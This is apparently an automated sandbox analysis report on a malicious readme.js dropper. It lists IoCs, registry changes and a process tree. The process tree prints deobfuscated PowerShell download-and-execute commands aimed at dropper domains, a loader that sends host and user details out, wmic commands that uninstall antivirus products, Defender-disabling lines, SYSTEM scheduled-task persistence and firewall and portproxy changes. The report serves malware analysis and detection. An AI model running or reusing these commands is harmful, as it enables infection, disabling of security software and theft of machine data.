f517526fc57eb33edb832920b1678d52ad1c5cf9c707859551fe065727587501

Resubmissions

13-01-2021 06:51

210113-rkhah56hvs 10

Analysis

max time kernel
60s
max time network
142s
platform
windows10_x64
resource
win10v20201028
submitted
13-01-2021 06:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

readme.js
Size

9KB
MD5

8a047f4917d75bb0bb6659e41569a9b7
SHA1

388ac00a76db82a0ac2434d1b4fb7420bab1a403
SHA256

f517526fc57eb33edb832920b1678d52ad1c5cf9c707859551fe065727587501
SHA512

0caf75d7adf94e624a6abe947e75e0d80a58fef8e331ee88a65fd24ee1f28e773295defa2cdac01e52ee7ebc8c3a0d2e8bb0676871bccab2fe1ea739b9de41c9

Score

10^/10

evasion

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://t.zz3r0.com

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://t.zer9g.com

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://t.bb3u9.com

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://t.bb3u9.com

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.EXE

flow pid process

9 1724 powershell.exe
30 4776 powershell.EXE
Executes dropped EXE 3 IoCs

Processes:

P5oWUfl.exeP5oWUfl.exeP5oWUfl.exe

pid process

4676 P5oWUfl.exe
4368 P5oWUfl.exe
4536 P5oWUfl.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Disabling Security Tools
T1089

Service Stop
T1489

flow	pid	process
9	1724	powershell.exe
30	4776	powershell.EXE

pid	process
4676	P5oWUfl.exe
4368	P5oWUfl.exe
4536	P5oWUfl.exe

Drops file in System32 directory 6 IoCs

Processes:

powershell.EXEpowershell.EXEsc.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Windowspowershell\V1.0\P5oWUfl.exe	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	sc.exe
File created	C:\Windows\System32\Windowspowershell\V1.0\P5oWUfl.exe	powershell.EXE

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4696 schtasks.exe
1404 schtasks.exe
1144 schtasks.exe
4156 schtasks.exe
4660 schtasks.exe
2132 schtasks.exe

pid	process
4696	schtasks.exe
1404	schtasks.exe
1144	schtasks.exe
4156	schtasks.exe
4660	schtasks.exe
2132	schtasks.exe

Modifies data under HKEY_USERS 287 IoCs

Processes:

powershell.EXEP5oWUfl.exepowershell.EXEschtasks.exeP5oWUfl.exeP5oWUfl.exesc.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	schtasks.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	schtasks.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	schtasks.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	schtasks.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	sc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	schtasks.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	schtasks.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	sc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	schtasks.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	schtasks.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	schtasks.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	schtasks.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	schtasks.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	P5oWUfl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	schtasks.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	schtasks.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

3116 notepad.exe

pid	process
3116	notepad.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

Processes:

powershell.exepowershell.exepowershell.EXEpowershell.EXEschtasks.exeP5oWUfl.exeP5oWUfl.exeP5oWUfl.exe

pid	process
1724	powershell.exe
1724	powershell.exe
1724	powershell.exe
3124	powershell.exe
3124	powershell.exe
3124	powershell.exe
4324	powershell.EXE
4324	powershell.EXE
4324	powershell.EXE
4324	powershell.EXE
4776	powershell.EXE
4776	powershell.EXE
4776	powershell.EXE
4776	powershell.EXE
4408	schtasks.exe
4408	schtasks.exe
4408	schtasks.exe
4408	schtasks.exe
4676	P5oWUfl.exe
4676	P5oWUfl.exe
4368	P5oWUfl.exe
4368	P5oWUfl.exe
4368	P5oWUfl.exe
4536	P5oWUfl.exe
4536	P5oWUfl.exe
4536	P5oWUfl.exe
4676	P5oWUfl.exe
4368	P5oWUfl.exe
4536	P5oWUfl.exe
4676	P5oWUfl.exe

Suspicious use of AdjustPrivilegeToken 393 IoCs

Processes:

powershell.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeIncreaseQuotaPrivilege	1724	powershell.exe
Token: SeSecurityPrivilege	1724	powershell.exe
Token: SeTakeOwnershipPrivilege	1724	powershell.exe
Token: SeLoadDriverPrivilege	1724	powershell.exe
Token: SeSystemProfilePrivilege	1724	powershell.exe
Token: SeSystemtimePrivilege	1724	powershell.exe
Token: SeProfSingleProcessPrivilege	1724	powershell.exe
Token: SeIncBasePriorityPrivilege	1724	powershell.exe
Token: SeCreatePagefilePrivilege	1724	powershell.exe
Token: SeBackupPrivilege	1724	powershell.exe
Token: SeRestorePrivilege	1724	powershell.exe
Token: SeShutdownPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeSystemEnvironmentPrivilege	1724	powershell.exe
Token: SeRemoteShutdownPrivilege	1724	powershell.exe
Token: SeUndockPrivilege	1724	powershell.exe
Token: SeManageVolumePrivilege	1724	powershell.exe
Token: 33	1724	powershell.exe
Token: 34	1724	powershell.exe
Token: 35	1724	powershell.exe
Token: 36	1724	powershell.exe
Token: SeIncreaseQuotaPrivilege	1724	powershell.exe
Token: SeSecurityPrivilege	1724	powershell.exe
Token: SeTakeOwnershipPrivilege	1724	powershell.exe
Token: SeLoadDriverPrivilege	1724	powershell.exe
Token: SeSystemProfilePrivilege	1724	powershell.exe
Token: SeSystemtimePrivilege	1724	powershell.exe
Token: SeProfSingleProcessPrivilege	1724	powershell.exe
Token: SeIncBasePriorityPrivilege	1724	powershell.exe
Token: SeCreatePagefilePrivilege	1724	powershell.exe
Token: SeBackupPrivilege	1724	powershell.exe
Token: SeRestorePrivilege	1724	powershell.exe
Token: SeShutdownPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeSystemEnvironmentPrivilege	1724	powershell.exe
Token: SeRemoteShutdownPrivilege	1724	powershell.exe
Token: SeUndockPrivilege	1724	powershell.exe
Token: SeManageVolumePrivilege	1724	powershell.exe
Token: 33	1724	powershell.exe
Token: 34	1724	powershell.exe
Token: 35	1724	powershell.exe
Token: 36	1724	powershell.exe
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeIncreaseQuotaPrivilege	2544	WMIC.exe
Token: SeSecurityPrivilege	2544	WMIC.exe
Token: SeTakeOwnershipPrivilege	2544	WMIC.exe
Token: SeLoadDriverPrivilege	2544	WMIC.exe
Token: SeSystemProfilePrivilege	2544	WMIC.exe
Token: SeSystemtimePrivilege	2544	WMIC.exe
Token: SeProfSingleProcessPrivilege	2544	WMIC.exe
Token: SeIncBasePriorityPrivilege	2544	WMIC.exe
Token: SeCreatePagefilePrivilege	2544	WMIC.exe
Token: SeBackupPrivilege	2544	WMIC.exe
Token: SeRestorePrivilege	2544	WMIC.exe
Token: SeShutdownPrivilege	2544	WMIC.exe
Token: SeDebugPrivilege	2544	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2544	WMIC.exe
Token: SeRemoteShutdownPrivilege	2544	WMIC.exe
Token: SeUndockPrivilege	2544	WMIC.exe
Token: SeManageVolumePrivilege	2544	WMIC.exe
Token: 33	2544	WMIC.exe
Token: 34	2544	WMIC.exe
Token: 35	2544	WMIC.exe

Suspicious use of WriteProcessMemory 72 IoCs

Processes:

wscript.execmd.exepowershell.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exepowershell.EXEcmd.exe

description	pid	process	target process
PID 3904 wrote to memory of 896	3904	wscript.exe	cmd.exe
PID 3904 wrote to memory of 896	3904	wscript.exe	cmd.exe
PID 896 wrote to memory of 3116	896	cmd.exe	notepad.exe
PID 896 wrote to memory of 3116	896	cmd.exe	notepad.exe
PID 896 wrote to memory of 1724	896	cmd.exe	powershell.exe
PID 896 wrote to memory of 1724	896	cmd.exe	powershell.exe
PID 1724 wrote to memory of 2920	1724	powershell.exe	cmd.exe
PID 1724 wrote to memory of 2920	1724	powershell.exe	cmd.exe
PID 1724 wrote to memory of 3124	1724	powershell.exe	powershell.exe
PID 1724 wrote to memory of 3124	1724	powershell.exe	powershell.exe
PID 1724 wrote to memory of 2480	1724	powershell.exe	cmd.exe
PID 1724 wrote to memory of 2480	1724	powershell.exe	cmd.exe
PID 2480 wrote to memory of 2544	2480	cmd.exe	WMIC.exe
PID 2480 wrote to memory of 2544	2480	cmd.exe	WMIC.exe
PID 1724 wrote to memory of 3728	1724	powershell.exe	cmd.exe
PID 1724 wrote to memory of 3728	1724	powershell.exe	cmd.exe
PID 3728 wrote to memory of 2472	3728	cmd.exe	WMIC.exe
PID 3728 wrote to memory of 2472	3728	cmd.exe	WMIC.exe
PID 1724 wrote to memory of 3992	1724	powershell.exe	cmd.exe
PID 1724 wrote to memory of 3992	1724	powershell.exe	cmd.exe
PID 3992 wrote to memory of 2476	3992	cmd.exe	WMIC.exe
PID 3992 wrote to memory of 2476	3992	cmd.exe	WMIC.exe
PID 1724 wrote to memory of 1112	1724	powershell.exe	cmd.exe
PID 1724 wrote to memory of 1112	1724	powershell.exe	cmd.exe
PID 1112 wrote to memory of 1432	1112	cmd.exe	WMIC.exe
PID 1112 wrote to memory of 1432	1112	cmd.exe	WMIC.exe
PID 1724 wrote to memory of 3812	1724	powershell.exe	cmd.exe
PID 1724 wrote to memory of 3812	1724	powershell.exe	cmd.exe
PID 3812 wrote to memory of 1308	3812	cmd.exe	WMIC.exe
PID 3812 wrote to memory of 1308	3812	cmd.exe	WMIC.exe
PID 1724 wrote to memory of 3348	1724	powershell.exe	cmd.exe
PID 1724 wrote to memory of 3348	1724	powershell.exe	cmd.exe
PID 3348 wrote to memory of 3372	3348	cmd.exe	WMIC.exe
PID 3348 wrote to memory of 3372	3348	cmd.exe	WMIC.exe
PID 1724 wrote to memory of 2056	1724	powershell.exe	cmd.exe
PID 1724 wrote to memory of 2056	1724	powershell.exe	cmd.exe
PID 2056 wrote to memory of 2424	2056	cmd.exe	WMIC.exe
PID 2056 wrote to memory of 2424	2056	cmd.exe	WMIC.exe
PID 1724 wrote to memory of 1144	1724	powershell.exe	schtasks.exe
PID 1724 wrote to memory of 1144	1724	powershell.exe	schtasks.exe
PID 1724 wrote to memory of 1144	1724	powershell.exe	schtasks.exe
PID 1724 wrote to memory of 1144	1724	powershell.exe	schtasks.exe
PID 1724 wrote to memory of 4156	1724	powershell.exe	schtasks.exe
PID 1724 wrote to memory of 4156	1724	powershell.exe	schtasks.exe
PID 1724 wrote to memory of 4296	1724	powershell.exe	schtasks.exe
PID 1724 wrote to memory of 4296	1724	powershell.exe	schtasks.exe
PID 1724 wrote to memory of 4660	1724	powershell.exe	schtasks.exe
PID 1724 wrote to memory of 4660	1724	powershell.exe	schtasks.exe
PID 1724 wrote to memory of 4756	1724	powershell.exe	schtasks.exe
PID 1724 wrote to memory of 4756	1724	powershell.exe	schtasks.exe
PID 1724 wrote to memory of 2132	1724	powershell.exe	schtasks.exe
PID 1724 wrote to memory of 2132	1724	powershell.exe	schtasks.exe
PID 1724 wrote to memory of 4664	1724	powershell.exe	schtasks.exe
PID 1724 wrote to memory of 4664	1724	powershell.exe	schtasks.exe
PID 4776 wrote to memory of 4456	4776	powershell.EXE	cmd.exe
PID 4776 wrote to memory of 4456	4776	powershell.EXE	cmd.exe
PID 4776 wrote to memory of 2096	4776	powershell.EXE	cmd.exe
PID 4776 wrote to memory of 2096	4776	powershell.EXE	cmd.exe
PID 4776 wrote to memory of 4596	4776	powershell.EXE	cmd.exe
PID 4776 wrote to memory of 4596	4776	powershell.EXE	cmd.exe
PID 2096 wrote to memory of 4640	2096	cmd.exe	cmd.exe
PID 2096 wrote to memory of 4640	2096	cmd.exe	cmd.exe
PID 2096 wrote to memory of 4676	2096	cmd.exe	P5oWUfl.exe
PID 2096 wrote to memory of 4676	2096	cmd.exe	P5oWUfl.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\readme.js
1⤵
- Suspicious use of WriteProcessMemory
PID:3904
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /b notepad C:\Users\Admin\AppData\Local\Temp\readme.js & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*EWYCRADZ*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:896
- - C:\Windows\system32\notepad.exe
    notepad C:\Users\Admin\AppData\Local\Temp\readme.js
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:3116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*EWYCRADZ*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1724
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c echo Set-MpPreference -DisableRealtimeMonitoring 1
      4⤵
      PID:2920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3124
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2480
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2544
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3728
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
        5⤵
        
        PID:2472
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3992
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
        5⤵
        
        PID:2476
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1112
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
        5⤵
        
        PID:1432
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3812
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
        5⤵
        
        PID:1308
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3348
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
        5⤵
        
        PID:3372
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2056
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
        5⤵
        
        PID:2424
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart
      4⤵
      PID:1144
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
      4⤵
      Creates scheduled task(s)
      PID:1144
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \D19eW7s /F /tr "powershell -w hidden -c PS_CMD"
      4⤵
      Creates scheduled task(s)
      PID:4156
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /run /tn \D19eW7s
      4⤵
      PID:4296
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn bIYS3m9UfoM\KikP6c /F /tr "powershell -w hidden -c PS_CMD"
      4⤵
      Creates scheduled task(s)
      PID:4660
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /run /tn bIYS3m9UfoM\KikP6c
      4⤵
      PID:4756
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\XBv2e3dtp\hFbQ24r /F /tr "powershell -w hidden -c PS_CMD"
      4⤵
      Creates scheduled task(s)
      PID:2132
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\XBv2e3dtp\hFbQ24r
      4⤵
      PID:4664
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c netsh.exe firewall add portopening tcp 65529 SDNSd
      4⤵
      PID:1552
    - - C:\Windows\system32\netsh.exe
        
        netsh.exe firewall add portopening tcp 65529 SDNSd
        5⤵
        
        PID:2136
  - - C:\Windows\system32\netsh.exe
      "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
      4⤵
      PID:5052
  - - C:\Windows\system32\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block
      4⤵
      PID:2856
  - - C:\Windows\system32\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block
      4⤵
      PID:4016
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa2 /F
      4⤵
      PID:5072
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa1 /F
      4⤵
      PID:2056
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /delete /tn Rtsa /F
      4⤵
      PID:4328

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:4140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zz3'+'r0.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zer'+'9g.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject 